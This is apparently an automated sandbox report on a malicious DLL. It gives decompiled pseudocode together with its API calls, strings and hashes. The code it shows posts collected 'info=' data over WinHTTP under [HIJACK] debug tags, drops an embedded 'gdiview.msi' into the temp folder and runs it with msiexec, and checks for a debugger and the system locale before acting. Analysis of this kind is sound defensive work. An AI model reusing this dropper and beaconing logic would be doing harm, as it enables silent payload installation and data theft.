                                                                                                                                                      				_push(0x30);
                                                                                                                                                      				_push("post_info");
                                                                                                                                                      				E1001F1D0(__edi, "[HIJACK][%s][%s][%d]: data = %s\n", PathFindFileNameA(".\\post_info.cpp"));
                                                                                                                                                      				_v132 = E100223F0(__ebx, __edi, __esi, _t127, _a12);
                                                                                                                                                      				E100225D0(__ebx, __edi, __esi, _t127,  &_v128);
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v196 = E10001160( &_v160, _t127, _a8);
                                                                                                                                                      				_v200 = _v196;
                                                                                                                                                      				_v8 = 1;
                                                                                                                                                      				E10001A70( &_v128, _v200);
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				E100011A0( &_v160);
                                                                                                                                                      				E10001160( &_v100, _t127, "info=");
                                                                                                                                                      				_v8 = 2;
                                                                                                                                                      				_v204 = E10001160( &_v188, _t127, _v132);
                                                                                                                                                      				_v208 = _v204;
                                                                                                                                                      				_v8 = 3;
                                                                                                                                                      				E10001A70( &_v100, _v208);
                                                                                                                                                      				_v8 = 2;
                                                                                                                                                      				E100011A0( &_v188);
                                                                                                                                                      				_push(E100011E0( &_v128));
                                                                                                                                                      				_push(0x3d);
                                                                                                                                                      				_push("post_info");
                                                                                                                                                      				E1001F1D0(_t117, "[HIJACK][%s][%s][%d]: url = %s\n", PathFindFileNameA(".\\post_info.cpp"));
                                                                                                                                                      				E10001160( &_v44, _t127, 0x10024ca2);
                                                                                                                                                      				_v8 = 4;
                                                                                                                                                      				E10001160( &_v72, _t127, 0x10024ca3);
                                                                                                                                                      				_v8 = 5;
                                                                                                                                                      				_t75 = E10001200( &_v100);
                                                                                                                                                      				_t76 = E100011E0( &_v100);
                                                                                                                                                      				E10021AF0(__ebx, _t117, __esi, _t127, 0, 0, 0, E100011E0( &_v128), 2, 1, 0, _t76, _t75, 0, 0, 0, 0, 0, 0,  &_v44,  &_v72);
                                                                                                                                                      				_push(_v132);
                                                                                                                                                      				E1000CA30(_t87, _t117, _t118, _t127);
                                                                                                                                                      				E10001110(_a4, _t127,  &_v72);
                                                                                                                                                      				_v192 = _v192 | 0x00000001;
                                                                                                                                                      				_v8 = 4;
                                                                                                                                                      				E100011A0( &_v72);
                                                                                                                                                      				_v8 = 2;
                                                                                                                                                      				E100011A0( &_v44);
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				E100011A0( &_v100);
                                                                                                                                                      				_v8 = 0xffffffff;
                                                                                                                                                      				E100011A0( &_v128);
                                                                                                                                                      				 *[fs:0x0] = _v16;
                                                                                                                                                      				return _a4;
                                                                                                                                                      			}























                                                                                                                                                      APIs
                                                                                                                                                      • PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,00000030,?), ref: 10022798
                                                                                                                                                        • Part of subcall function 1001F1D0: _memset.LIBCMT ref: 1001F1FB
                                                                                                                                                        • Part of subcall function 1001F1D0: OutputDebugStringA.KERNEL32(?,?,?,?,?,100227A9,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F233
                                                                                                                                                        • Part of subcall function 100223F0: _memset.LIBCMT ref: 10022444
                                                                                                                                                        • Part of subcall function 100223F0: _strlen.LIBCMT ref: 10022478
                                                                                                                                                        • Part of subcall function 100223F0: _memset.LIBCMT ref: 100224E6
                                                                                                                                                        • Part of subcall function 100223F0: _strlen.LIBCMT ref: 100224F2
                                                                                                                                                        • Part of subcall function 100225D0: _memset.LIBCMT ref: 10022624
                                                                                                                                                        • Part of subcall function 100225D0: GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 10022645
                                                                                                                                                        • Part of subcall function 100225D0: _sprintf.LIBCMT ref: 10022666
                                                                                                                                                      • PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,0000003D,00000000,?,?,info=,?,?), ref: 1002287A
                                                                                                                                                        • Part of subcall function 10021AF0: WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021C24
                                                                                                                                                        • Part of subcall function 10021AF0: WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021C6C
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                        • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                        • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$FileFindHttpNamePath_strlen$DebugErrorFreeHeapLastLocalOpenOptionOutputStringTime___sbh_find_block___sbh_free_block_sprintf
                                                                                                                                                      • String ID: .\post_info.cpp$.\post_info.cpp$[HIJACK][%s][%s][%d]: data = %s$[HIJACK][%s][%s][%d]: url = %s$info=$post_info$post_info
                                                                                                                                                      • API String ID: 728604215-152146038
                                                                                                                                                      • Opcode ID: 595fa8cd932e3625ab91877eb1d9ec3bfaedeea9d9515ddbb056345a5ee8ff59
                                                                                                                                                      • Instruction ID: 42968dd6338b29c892dd1ec079196b21a890ae0ab2ff2efbcc3c73078d1eef52
                                                                                                                                                      • Opcode Fuzzy Hash: 595fa8cd932e3625ab91877eb1d9ec3bfaedeea9d9515ddbb056345a5ee8ff59
                                                                                                                                                      • Instruction Fuzzy Hash: 38515F75C01258EBEB14DB94DC52FDEBB74EF18380F504198F60A67286DB702B04CB52
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                      			E1001A480(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, char* _a4) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				char _v164;
                                                                                                                                                      				intOrPtr _v168;
                                                                                                                                                      				intOrPtr _v172;
                                                                                                                                                      				intOrPtr _v176;
                                                                                                                                                      				void* __ebp;
                                                                                                                                                      				void* _t36;
                                                                                                                                                      				void* _t75;
                                                                                                                                                      				void* _t80;
                                                                                                                                                      				void* _t81;
                                                                                                                                                      
                                                                                                                                                      				_t74 = __esi;
                                                                                                                                                      				_t73 = __edi;
                                                                                                                                                      				_t57 = __ebx;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v176 = L1000CE56(__ebx, __edx, __edi, __esi, 0x10);
                                                                                                                                                      				_v168 = L1000CE56(__ebx, __edx, __edi, __esi, 0x21);
                                                                                                                                                      				E1000CF20(__edi, _v168, 0, 0x21);
                                                                                                                                                      				E1000CF20(_t73, _v176, 0, 0x10);
                                                                                                                                                      				_t67 = _a4;
                                                                                                                                                      				_t36 = E1000CAC0(_a4);
                                                                                                                                                      				_t80 = _t75 + 0x24;
                                                                                                                                                      				if(_t36 <= 0) {
                                                                                                                                                      					E1000E280(_v168, "00000000000000000000000000000000");
                                                                                                                                                      					_t81 = _t80 + 8;
                                                                                                                                                      				} else {
                                                                                                                                                      					E1001BC10( &_v164);
                                                                                                                                                      					E1001CAC0( &_v164, _a4, E1000CAC0(_a4));
                                                                                                                                                      					_t67 =  &_v164;
                                                                                                                                                      					E1001CBC0( &_v164, _v176);
                                                                                                                                                      					_t81 = _t80 + 0x1c;
                                                                                                                                                      					_v8 = 0;
                                                                                                                                                      					while(_v8 < 0x10) {
                                                                                                                                                      						_t67 = _v168 + _v8 * 2;
                                                                                                                                                      						E1000CC93(_t73, _v168 + _v8 * 2, "%02X",  *(_v176 + _v8) & 0xff);
                                                                                                                                                      						_t81 = _t81 + 0xc;
                                                                                                                                                      						_v8 = _v8 + 1;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_push(_v176);
                                                                                                                                                      				E1000CA30(_t57, _t73, _t74, __eflags);
                                                                                                                                                      				_v172 = L1000CE56(_t57, _t67, _t73, _t74, 0x11);
                                                                                                                                                      				E1000CF20(_t73, _v172, 0, 0x11);
                                                                                                                                                      				__eflags = _v168 + 8;
                                                                                                                                                      				E1000D190(_t57, _t73, _t74, _v172, _v168 + 8, 0x10);
                                                                                                                                                      				_push(_v168);
                                                                                                                                                      				E1000CA30(_t57, _t73, _t74, __eflags);
                                                                                                                                                      				return _v172;
                                                                                                                                                      			}














                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$_strlenund_memcpy$_sprintf_strcat
                                                                                                                                                      • String ID: %02X$00000000000000000000000000000000
                                                                                                                                                      • API String ID: 796335831-606320477
                                                                                                                                                      • Opcode ID: cddf9aa94f1a26cbff01d8f54016213bcb26ef308eb76885f362afd6834819d9
                                                                                                                                                      • Instruction ID: 5f34500701607727b308b008c02476916cf30523b6eb1de7e1c0da2fd1923ee1
                                                                                                                                                      • Opcode Fuzzy Hash: cddf9aa94f1a26cbff01d8f54016213bcb26ef308eb76885f362afd6834819d9
                                                                                                                                                      • Instruction Fuzzy Hash: 6D3162BAE0030CABEB10DB60DC42FAE7375DF46344F0444A4F9496B246E671EB949B93
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001FC70(void* __edi, void* __eflags) {
                                                                                                                                                      				char _v1027;
                                                                                                                                                      				char _v1028;
                                                                                                                                                      				char _v1291;
                                                                                                                                                      				char _v1292;
                                                                                                                                                      				int _t21;
                                                                                                                                                      
                                                                                                                                                      				_t29 = __edi;
                                                                                                                                                      				_v1292 = 0;
                                                                                                                                                      				E1000CF20(__edi,  &_v1291, 0, 0x103);
                                                                                                                                                      				_v1028 = 0;
                                                                                                                                                      				E1000CF20(_t29,  &_v1027, 0, 0x3ff);
                                                                                                                                                      				GetTempPathA(0x104,  &_v1292);
                                                                                                                                                      				E1000CD96( &_v1292,  &_v1292, 0x104, "gdiview.msi");
                                                                                                                                                      				E1000CC93(_t29,  &_v1028, "msiexec.exe /i \"%s\"",  &_v1292);
                                                                                                                                                      				E1001FC10( &_v1292, 0x10026888, 0x39e00);
                                                                                                                                                      				_t21 = PathFileExistsA( &_v1292);
                                                                                                                                                      				_t38 = _t21;
                                                                                                                                                      				if(_t21 != 0) {
                                                                                                                                                      					return E1001A1D0(_t38,  &_v1028);
                                                                                                                                                      				}
                                                                                                                                                      				return _t21;
                                                                                                                                                      			}









                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001FC8E
                                                                                                                                                      • _memset.LIBCMT ref: 1001FCAB
                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FCBF
                                                                                                                                                      • _strcat_s.LIBCMT ref: 1001FCD6
                                                                                                                                                      • _sprintf.LIBCMT ref: 1001FCF1
                                                                                                                                                        • Part of subcall function 1001FC10: CreateFileA.KERNEL32(10026888,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1001FC33
                                                                                                                                                        • Part of subcall function 1001FC10: WriteFile.KERNEL32(00039E00,00000000,00000000,10026888,00000000), ref: 1001FC4E
                                                                                                                                                        • Part of subcall function 1001FC10: CloseHandle.KERNEL32(00039E00), ref: 1001FC63
                                                                                                                                                      • PathFileExistsA.SHLWAPI(00000000), ref: 1001FD19
                                                                                                                                                        • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                        • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
                                                                                                                                                        • Part of subcall function 1001A1D0: CreateProcessA.KERNEL32(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
                                                                                                                                                        • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                        • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$CloseFileHandle$CreatePath$ExistsProcessTempWrite_sprintf_strcat_s
                                                                                                                                                      • String ID: gdiview.msi$msiexec.exe /i "%s"
                                                                                                                                                      • API String ID: 1459467440-729886463
                                                                                                                                                      • Opcode ID: cfe5d9c9d1d3e7bc7d2d8329fe4a4c5a513885faf241df6a6b0121b9ea01f52c
                                                                                                                                                      • Instruction ID: fc1d18d4907088cb0004c85748b024e0f714aa859ea981698376c8e2dc0c21e3
                                                                                                                                                      • Opcode Fuzzy Hash: cfe5d9c9d1d3e7bc7d2d8329fe4a4c5a513885faf241df6a6b0121b9ea01f52c
                                                                                                                                                      • Instruction Fuzzy Hash: 431170BAD402186AE750D760EC46FEE7328DB54701F4444A4BB48A5085EBB1A7988F92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 89%
                                                                                                                                                      			E10020575(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                      				intOrPtr _t31;
                                                                                                                                                      				void* _t35;
                                                                                                                                                      				void* _t47;
                                                                                                                                                      				void* _t49;
                                                                                                                                                      				intOrPtr _t51;
                                                                                                                                                      				void* _t52;
                                                                                                                                                      				intOrPtr _t53;
                                                                                                                                                      				intOrPtr _t55;
                                                                                                                                                      				intOrPtr _t57;
                                                                                                                                                      
                                                                                                                                                      				_t62 = __eflags;
                                                                                                                                                      				_t45 = __esi;
                                                                                                                                                      				_t44 = __edi;
                                                                                                                                                      				_t36 = __ebx;
                                                                                                                                                      				E1001FDB0();
                                                                                                                                                      				E1001FF90(__ebx, __edi, __esi, __eflags, "install", "user01", "-0.25", "45.0.0", "exe");
                                                                                                                                                      				_t51 = _t49 + 0x14 - 0x1c;
                                                                                                                                                      				_t37 = _t51;
                                                                                                                                                      				 *((intOrPtr*)(_t47 - 0x248)) = _t51;
                                                                                                                                                      				 *((intOrPtr*)(_t47 - 0x260)) = E10001160(_t51, __eflags, "status=main_start");
                                                                                                                                                      				E10020180(__ebx, __edi, __esi, _t62);
                                                                                                                                                      				_t52 = _t51 + 0x1c;
                                                                                                                                                      				if(PathFileExistsA("C:\\hijack") != 0) {
                                                                                                                                                      					L7:
                                                                                                                                                      					_t53 = _t52 - 0x1c;
                                                                                                                                                      					 *((intOrPtr*)(_t47 - 0x24c)) = _t53;
                                                                                                                                                      					 *((intOrPtr*)(_t47 - 0x264)) = E10001160(_t53, __eflags, "status=check_debug");
                                                                                                                                                      					E10020180(_t36, _t44, _t45, __eflags);
                                                                                                                                                      					_t55 = _t53 + 0x1c - 0x1c;
                                                                                                                                                      					 *((intOrPtr*)(_t47 - 0x250)) = _t55;
                                                                                                                                                      					 *((intOrPtr*)(_t47 - 0x268)) = E10001160(_t55, __eflags, "user01");
                                                                                                                                                      					E1001FEA0(_t36, _t44, _t45, __eflags);
                                                                                                                                                      					_t57 = _t55 + 0x1c - 0x1c;
                                                                                                                                                      					 *((intOrPtr*)(_t47 - 0x254)) = _t57;
                                                                                                                                                      					 *((intOrPtr*)(_t47 - 0x26c)) = E10001160(_t57, __eflags, "user01");
                                                                                                                                                      					E1001FDC0(_t36, _t44, _t45, __eflags);
                                                                                                                                                      					_t59 = _t57 + 0x1c - 0x1c;
                                                                                                                                                      					 *((intOrPtr*)(_t47 - 0x258)) = _t57 + 0x1c - 0x1c;
                                                                                                                                                      					 *((intOrPtr*)(_t47 - 0x270)) = E10001160(_t59, __eflags, "status=main_over");
                                                                                                                                                      					E10020180(_t36, _t44, _t45, __eflags);
                                                                                                                                                      				} else {
                                                                                                                                                      					E1001A0A0();
                                                                                                                                                      					if(E1001A0B0(_t37) == 0 || E10019D10() != 0) {
                                                                                                                                                      					} else {
                                                                                                                                                      						_t35 = E1001FA30(_t36, _t44, _t45, __eflags, 0x3e8, 0);
                                                                                                                                                      						_t52 = _t52 + 8;
                                                                                                                                                      						__eflags = _t35;
                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                      							goto L7;
                                                                                                                                                      						} else {
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				E1001A260();
                                                                                                                                                      				 *((intOrPtr*)(_t47 - 0x25c)) = 1;
                                                                                                                                                      				 *((intOrPtr*)(_t47 - 4)) = 0xffffffff;
                                                                                                                                                      				E100011A0(_t47 - 0x28);
                                                                                                                                                      				_t31 =  *((intOrPtr*)(_t47 - 0x25c));
                                                                                                                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
                                                                                                                                                      				return _t31;
                                                                                                                                                      			}













                                                                                                                                                      APIs
                                                                                                                                                      • PathFileExistsA.SHLWAPI(C:\hijack), ref: 10020692
                                                                                                                                                        • Part of subcall function 10019D10: GetSystemDefaultLCID.KERNEL32 ref: 10019D1D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DefaultExistsFilePathSystem
                                                                                                                                                      • String ID: -0.25$45.0.0$C:\hijack$exe$install$status=main_start$user01
                                                                                                                                                      • API String ID: 482051434-1656717437
                                                                                                                                                      • Opcode ID: 0a904efb4324982fc1db73172a1754b2f1969f879e70f59afb907af5123e15f7
                                                                                                                                                      • Instruction ID: 76c3a66b6cadf2752fd619ea01efa0c867ff815aaebb18d2e7d5061645e6b307
                                                                                                                                                      • Opcode Fuzzy Hash: 0a904efb4324982fc1db73172a1754b2f1969f879e70f59afb907af5123e15f7
                                                                                                                                                      • Instruction Fuzzy Hash: 0501F978D083189FD750FFA49C4A7DE77B2DF40254F900198FD0866143EB31B5909E62
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                      			E1002185A(void* __ebx, void* __edx, void* __edi) {
                                                                                                                                                      				void* _t60;
                                                                                                                                                      				void* _t80;
                                                                                                                                                      				void* _t101;
                                                                                                                                                      				void* _t154;
                                                                                                                                                      				void* _t156;
                                                                                                                                                      				void* _t158;
                                                                                                                                                      				void* _t171;
                                                                                                                                                      
                                                                                                                                                      				L0:
                                                                                                                                                      				while(1) {
                                                                                                                                                      					L0:
                                                                                                                                                      					_t150 = __edi;
                                                                                                                                                      					_t106 = __ebx;
                                                                                                                                                      					 *((intOrPtr*)(_t154 - 0xe2e0)) =  *((intOrPtr*)(_t154 - 0xe2e0)) + 1;
                                                                                                                                                      					_t60 = E100021E0(_t154 - 0xe2a4);
                                                                                                                                                      					_t174 =  *((intOrPtr*)(_t154 - 0xe2e0)) - _t60;
                                                                                                                                                      					if( *((intOrPtr*)(_t154 - 0xe2e0)) >= _t60) {
                                                                                                                                                      						break;
                                                                                                                                                      					}
                                                                                                                                                      					L2:
                                                                                                                                                      					E1000CF20(__edi, _t154 - 0xab84, 0, 0x3710);
                                                                                                                                                      					E1000CF20(_t150, _t154 - 0x3d54, 0, 0x3710);
                                                                                                                                                      					_t80 = E10001A50(E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), "=");
                                                                                                                                                      					_t151 = _t80 - E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0))));
                                                                                                                                                      					E1000D190(__ebx, _t150, _t80 - E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), _t154 - 0xab84, E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), _t80 - E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))));
                                                                                                                                                      					E1000D8A3( *((intOrPtr*)(_t154 - 0xe2e0)), _t154 - 0x3d54, 0x3710, E10001A50(E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), "=") + 1);
                                                                                                                                                      					E1000CF20(_t150, _t154 - 0xe294, 0, 0x3710);
                                                                                                                                                      					E1000CF20(_t150, _t154 - 0x746c, 0, 0x3710);
                                                                                                                                                      					E1000CC93(_t150, _t154 - 0xe294,  *((intOrPtr*)(_t154 - 0x3d58)), _t154 - 0xab84);
                                                                                                                                                      					_push(_t154 - 0x3d54);
                                                                                                                                                      					_push(_t154 - 0xe294);
                                                                                                                                                      					_push( *((intOrPtr*)(_t154 + 8)));
                                                                                                                                                      					E1000CC93(_t150, _t154 - 0x746c,  *((intOrPtr*)(_t154 - 0x7470)),  *((intOrPtr*)(_t154 - 0x18)));
                                                                                                                                                      					_t171 = _t156 + 0x7c;
                                                                                                                                                      					if( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) != 0) {
                                                                                                                                                      						E1000D190(_t106, _t150, _t151,  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) +  *((intOrPtr*)(_t154 - 0x14)), _t154 - 0x746c, E1000CAC0(_t154 - 0x746c));
                                                                                                                                                      						_t171 = _t171 + 0x10;
                                                                                                                                                      					}
                                                                                                                                                      					_t101 = E1000CAC0(_t154 - 0x746c);
                                                                                                                                                      					_t156 = _t171 + 4;
                                                                                                                                                      					 *((intOrPtr*)(_t154 - 0x14)) = _t101 +  *((intOrPtr*)(_t154 - 0x14));
                                                                                                                                                      				}
                                                                                                                                                      				L5:
                                                                                                                                                      				 *((char*)(_t154 - 4)) = 1;
                                                                                                                                                      				E100011A0(_t154 - 0xe2dc);
                                                                                                                                                      				 *((char*)(_t154 - 4)) = 0;
                                                                                                                                                      				E10003010(_t154 - 0xe2a4);
                                                                                                                                                      				 *((intOrPtr*)(_t154 - 4)) = 0xffffffff;
                                                                                                                                                      				E100011A0(_t154 - 0xe2c0);
                                                                                                                                                      				 *(_t154 - 0x10) = "\r\n%s%s%s\r\n";
                                                                                                                                                      				 *((char*)(_t154 - 0x21c)) = 0;
                                                                                                                                                      				E1000CF20(__edi, _t154 - 0x21b, 0, 0x1ff);
                                                                                                                                                      				_push( *((intOrPtr*)(_t154 - 0x18)));
                                                                                                                                                      				_push( *((intOrPtr*)(_t154 + 8)));
                                                                                                                                                      				E1000CC93(_t150, _t154 - 0x21c,  *(_t154 - 0x10),  *((intOrPtr*)(_t154 - 0x18)));
                                                                                                                                                      				_t158 = _t156 + 0x20;
                                                                                                                                                      				if( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) != 0) {
                                                                                                                                                      					E1000D190(__ebx, _t150, _t151,  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) +  *((intOrPtr*)(_t154 - 0x14)), _t154 - 0x21c, E1000CAC0(_t154 - 0x21c));
                                                                                                                                                      					_t158 = _t158 + 0x10;
                                                                                                                                                      				}
                                                                                                                                                      				 *((intOrPtr*)(_t154 - 0x14)) = E1000CAC0(_t154 - 0x21c) +  *((intOrPtr*)(_t154 - 0x14));
                                                                                                                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t154 - 0xc));
                                                                                                                                                      				return  *((intOrPtr*)(_t154 - 0x14));
                                                                                                                                                      			}











                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$_strlen$_sprintf$__output_l_strcpy_s
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3854912713-0
                                                                                                                                                      • Opcode ID: b322046e219f78ca5d588c42d31cd5ab94df7dbf5b27a50053a166c6a7f0d488
                                                                                                                                                      • Instruction ID: ecc14f8781584b065d37a28c2fb0b24bdd6a5e60bbd0adb2cb8e7c12e54bf0d8
                                                                                                                                                      • Opcode Fuzzy Hash: b322046e219f78ca5d588c42d31cd5ab94df7dbf5b27a50053a166c6a7f0d488
                                                                                                                                                      • Instruction Fuzzy Hash: 3B4192B6D002186BDB14D7A0DC92EEE737DEF54280F0449A9F50DB6246EA747B448BA2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                      			E100223F0(void* __ebx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				char _v16;
                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                      				char _v24;
                                                                                                                                                      				char _v36;
                                                                                                                                                      				char _v292;
                                                                                                                                                      				signed int _v296;
                                                                                                                                                      				char _v300;
                                                                                                                                                      				intOrPtr _v304;
                                                                                                                                                      				char _v308;
                                                                                                                                                      				intOrPtr _v312;
                                                                                                                                                      				void* __ebp;
                                                                                                                                                      				char _t61;
                                                                                                                                                      				char _t62;
                                                                                                                                                      				signed int _t70;
                                                                                                                                                      				intOrPtr _t102;
                                                                                                                                                      				intOrPtr _t103;
                                                                                                                                                      				char _t115;
                                                                                                                                                      				char _t116;
                                                                                                                                                      				signed int _t118;
                                                                                                                                                      
                                                                                                                                                      				_t132 = __esi;
                                                                                                                                                      				_t131 = __edi;
                                                                                                                                                      				_t101 = __ebx;
                                                                                                                                                      				_t61 = "rundll32"; // 0x646e7572
                                                                                                                                                      				_v24 = _t61;
                                                                                                                                                      				_t102 =  *0x100254e4; // 0x32336c6c
                                                                                                                                                      				_v20 = _t102;
                                                                                                                                                      				_t115 =  *0x100254e8; // 0x0
                                                                                                                                                      				_v16 = _t115;
                                                                                                                                                      				_t62 = "explorer"; // 0x6c707865
                                                                                                                                                      				_v308 = _t62;
                                                                                                                                                      				_t103 =  *0x100254f0; // 0x7265726f
                                                                                                                                                      				_v304 = _t103;
                                                                                                                                                      				_t116 =  *0x100254f4; // 0x0
                                                                                                                                                      				_v300 = _t116;
                                                                                                                                                      				E1000CF20(__edi,  &_v292, 0, 0x108);
                                                                                                                                                      				E1001F150( &_v24,  &_v292,  &_v24);
                                                                                                                                                      				E1000D190(__ebx, _t131, __esi,  &_v36,  &_v308, 8);
                                                                                                                                                      				_t118 = _a4;
                                                                                                                                                      				_v12 = E1000CAC0(_t118);
                                                                                                                                                      				_v296 = 0;
                                                                                                                                                      				_t70 = _v12 & 0x80000007;
                                                                                                                                                      				if(_t70 < 0) {
                                                                                                                                                      					_t70 = (_t70 - 0x00000001 | 0xfffffff8) + 1;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t70 == 0) {
                                                                                                                                                      					_t120 = _v12 + 8;
                                                                                                                                                      					__eflags = _t120;
                                                                                                                                                      					_v296 = _t120;
                                                                                                                                                      				} else {
                                                                                                                                                      					asm("cdq");
                                                                                                                                                      					_t120 = _t118 & 0x00000007;
                                                                                                                                                      					_v296 = 8 + (_v12 + (_t118 & 0x00000007) >> 3) * 8;
